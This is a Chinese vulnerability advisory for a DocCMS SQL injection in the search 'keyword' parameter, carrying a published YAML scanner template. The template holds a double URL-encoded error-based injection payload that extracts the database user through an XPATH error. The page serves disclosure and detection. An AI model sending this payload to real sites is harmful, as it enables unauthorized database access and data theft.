doc-cms-keyword-sql-injection: DocCMS keyword SQL注入漏洞

日期: 2025-09-01 | 影响软件: Doc CMS keyword sql injection | POC: 已公开

漏洞描述

DocCMS keyword参数存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库信息 app="Doccms"

PoC代码[已公开]

id: doc-cms-keyword-sql-injection

info:
  name: DocCMS keyword SQL注入漏洞
  author: daffainfo
  severity: critical
  description: DocCMS keyword参数存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库信息 app="Doccms"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/DocCMS%20keyword%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33
    expression: response.status == 200 && response.body.bcontains(b'数据库错误:') && response.body.bcontains(b'XPATH syntax error:')
expression: r0()

相关漏洞推荐